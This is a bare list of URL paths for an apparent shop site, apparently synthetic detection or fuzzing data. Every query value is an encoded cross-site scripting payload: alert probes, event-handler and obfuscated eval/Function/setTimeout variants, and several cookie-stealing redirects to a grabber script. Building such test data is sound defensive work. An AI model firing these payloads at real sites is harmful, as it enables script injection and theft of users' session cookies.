/wishlist?phone=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?category1=%3Csvg%20onload%3Dalert%281%29%3E
/search?book=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?category1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?query=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?value1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?laptop=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?laptop=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?phone=%3Csvg%20onload%3Dalert%281%29%3E
/wishlist?phone=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/login?laptop=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?book=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?book=%3Csvg%20onload%3Dalert%281%29%3E
/cart?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/login?username1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/checkout?action1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/wishlist?electronics=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?password123=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?phone=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?category1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?value1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?value1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/wishlist?value1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?banana=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?query=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?username1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/products?book=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/checkout?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?search_term=%3Csvg%20onload%3Dalert%281%29%3E
/cart?laptop=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?query=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?book=%3Csvg%20onload%3Dalert%281%29%3E
/api?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?password123=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?apple=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?book=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?category1=%3Csvg%20onload%3Dalert%281%29%3E
/cart?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?phone=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?apple=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?electronics=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?password123=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?action1=%3Csvg%20onload%3Dalert%281%29%3E
/order?electronics=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?search_term=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?book=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?apple=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?banana=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/products?laptop=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?apple=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?banana=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?book=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?search_term=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?value1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?book=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?username1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?shoes=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?action1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?search_term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?banana=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?category1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?search_term=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?laptop=%3Csvg%20onload%3Dalert%281%29%3E
/api?electronics=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?book=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?shoes=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?query=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?password123=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?phone=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?shoes=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?banana=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?electronics=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?apple=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?query=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/login?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?banana=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?action1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?username1=%3Csvg%20onload%3Dalert%281%29%3E
/products?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?password123=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?apple=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?query=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/login?banana=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/cart?banana=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?electronics=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?phone=%3Csvg%20onload%3Dalert%281%29%3E
/search?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/checkout?username1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/order?query=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?banana=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?shoes=%3Csvg%20onload%3Dalert%281%29%3E
/login?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?apple=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?apple=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?laptop=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?apple=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?apple=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?shoes=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/products?electronics=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?laptop=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?password123=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/login?shoes=%3Csvg%20onload%3Dalert%281%29%3E
/cart?value1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?electronics=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?electronics=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?shoes=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?value1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?book=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?password123=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?value1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?banana=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?shoes=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/search?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/checkout?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?category1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?shoes=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?query=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?query=%3Csvg%20onload%3Dalert%281%29%3E
/checkout?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/cart?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/checkout?shoes=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?value1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?laptop=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?book=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?search_term=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/login?banana=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?search_term=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/products?action1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/search?value1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?username1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?apple=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/checkout?apple=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/checkout?shoes=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?action1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?book=%3Csvg%20onload%3Dalert%281%29%3E
/search?value1=%3Csvg%20onload%3Dalert%281%29%3E
/api?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/order?laptop=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/login?electronics=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/login?password123=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/products?apple=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?banana=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?shoes=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?category1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?electronics=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?apple=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?username1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?category1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?search_term=%3Csvg%20onload%3Dalert%281%29%3E
/login?action1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/wishlist?value1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/checkout?action1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?book=%3Csvg%20onload%3Dalert%281%29%3E
/login?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?action1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?apple=%3Csvg%20onload%3Dalert%281%29%3E
/wishlist?electronics=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?search_term=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?shoes=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?apple=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/products?search_term=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?password123=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/checkout?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?category1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?shoes=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?phone=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/api?laptop=%3Csvg%20onload%3Dalert%281%29%3E
/wishlist?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?banana=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?book=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?search_term=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?value1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?action1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?username1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?electronics=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/search?electronics=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?query=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?query=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/order?apple=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?phone=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?phone=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?value1=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?value1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/products?action1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/api?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?password123=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?query=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?apple=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?banana=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?action1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?action1=%3Csvg%20onload%3Dalert%281%29%3E
/search?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?electronics=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?phone=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?laptop=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?username1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?shoes=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?electronics=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?laptop=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/cart?search_term=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/wishlist?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?action1=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?electronics=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?query=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?banana=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?phone=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/search?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?value1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?username1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/checkout?banana=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?shoes=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/cart?category1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/wishlist?action1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?password123=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?value1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/wishlist?banana=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?book=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/api?category1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?shoes=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?shoes=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?action1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?value1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/checkout?apple=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?apple=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?search_term=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?category1=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/search?category1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?phone=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/login?banana=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?shoes=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?apple=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?query=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/order?electronics=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?category1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?electronics=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?book=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/checkout?search_term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/login?apple=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/products?book=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?username1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/order?shoes=%3Csvg%20onload%3Dalert%281%29%3E
/products?phone=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?banana=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/products?value1=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?password123=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/search?laptop=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/login?laptop=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/login?apple=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?password123=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/api?action1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/login?category1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?action1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/wishlist?phone=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/wishlist?electronics=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?banana=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/order?phone=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/api?book=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?phone=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/search?apple=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/products?value1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/checkout?phone=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/order?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?book=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/cart?apple=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/api?banana=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?password123=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?password123=%3Csvg%20onload%3Dalert%281%29%3E
/order?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/login?category1=%3Csvg%20onload%3Dalert%281%29%3E
/order?search_term=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/products?phone=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/checkout?username1=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?search_term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
